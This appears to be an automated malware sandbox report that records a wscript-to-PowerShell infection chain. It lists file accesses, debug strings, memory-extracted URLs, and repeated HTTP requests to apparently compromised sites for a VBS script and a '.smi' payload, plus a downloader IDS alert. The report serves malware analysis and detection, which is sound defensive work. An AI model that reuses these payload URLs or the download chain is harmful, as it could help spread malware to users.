          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1737945306.0000022A2AF37000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb]Y source: powershell.exe, 00000003.00000002.1552369513.000002A67C75B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kore.pdb5 source: powershell.exe, 00000007.00000002.2755751802.00000225370D5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Htem.pdb% source: powershell.exe, 00000007.00000002.2755751802.00000225370D5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdb 024 source: powershell.exe, 00000000.00000002.1735847498.0000022A2ACA6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *.pdb source: powershell.exe, 00000000.00000002.1737945306.0000022A2AF37000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000000.00000002.1737945306.0000022A2AF37000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: n.pdb'N source: powershell.exe, 00000003.00000002.1554888189.000002A67CA85000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ystem.pdb! source: powershell.exe, 00000007.00000002.2755751802.00000225370D5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1553056553.000002A67C7DF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb- source: powershell.exe, 00000007.00000002.2752630395.0000022536E27000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ion.pdb source: powershell.exe, 00000003.00000002.1553056553.000002A67C7DF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbg source: powershell.exe, 00000007.00000002.2755751802.0000022537072000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Target.pdbon.resourcesy source: powershell.exe, 00000000.00000002.1735847498.0000022A2AC61000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: embly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000007.00000002.2755751802.00000225370AB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: utomation.pdb source: powershell.exe, 00000003.00000002.1554151718.000002A67C9DA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdb source: powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2755751802.00000225370C4000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: global trafficHTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.fornid.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /na/mg.vbs HTTP/1.1Host: www.pineappletech.aeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.com
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 148.251.114.233 148.251.114.233
          Source: Joe Sandbox ViewASN Name: SERVERPLAN-ASIT SERVERPLAN-ASIT
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49712 -> 184.171.244.231:443
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.almrwad.comConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.fornid.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /na/mg.vbs HTTP/1.1Host: www.pineappletech.aeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.com
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
          Source: global trafficDNS traffic detected: DNS query: www.fornid.com
          Source: global trafficDNS traffic detected: DNS query: www.pineappletech.ae
          Source: global trafficDNS traffic detected: DNS query: www.almrwad.com
          Source: global trafficDNS traffic detected: DNS query: www.erp-royal-crown.info
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:26 GMTServer: ApacheP3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyisiM0e%2FK268mtgB%2FbNpOhPhr4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZKAr8c7Z1ao6vEvWxyuOg1g%3D000074; expires=Wed, 25-Dec-2024 09:39:26 GMT; Max-Age=1727999; path=/; domain=www.fornid.com; httponlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:34 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:39:45 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:51 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:39:57 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:03 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:09 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:15 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:21 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:26 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:32 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:38 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:44 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:50 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:56 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:41:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:41:07 GMTserver: LiteSpeed
          Source: powershell.exe, 00000007.00000002.2653474547.000002251FAEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FDD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FCD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://almrwad.com
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blog.fornid.com/
          Source: powershell.exe, 00000000.00000002.1737945306.0000022A2AF37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
          Source: powershell.exe, 00000007.00000002.2653474547.000002251FCF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FC05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FEF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://erp-royal-crown.info
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A1470B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fornid.com
          Source: powershell.exe, 00000003.00000002.1530508582.000002A60090A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
          Source: powershell.exe, 00000000.00000002.1729316042.0000022A22C8F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1729316042.0000022A22DD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1547285590.000002A61006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2743521529.000002252EA9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A12C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530508582.000002A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EA31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000007.00000002.2653474547.000002251FAEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FDD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FCD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.almrwad.com
          Source: powershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000007.00000002.2653474547.000002251FCF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FC05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FEF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.erp-royal-crown.info
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1669645213.0000022A1470B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com/
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com/content/13-international-shipments
          Source: powershell.exe, 00000000.00000002.1737765751.0000022A2ADB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14B84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pineappletech.ae
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A12C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530508582.000002A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EA31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601625000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
          Source: powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Archivo
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Istok
          Source: powershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2752630395.0000022536DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A13852000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530508582.000002A601625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1530508582.000002A60090A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000000.00000002.1729316042.0000022A22C8F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1729316042.0000022A22DD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1547285590.000002A61006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2743521529.000002252EA9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
          Source: powershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.c
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.co
          Source: powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EC5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FCD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/w
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/S
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Su
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Sub
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subo
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subor
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subord
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordi
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordin
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordine
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordiner
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinere
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordineren
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerend
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerende
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes7
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.s
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.sm
          Source: powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.smi
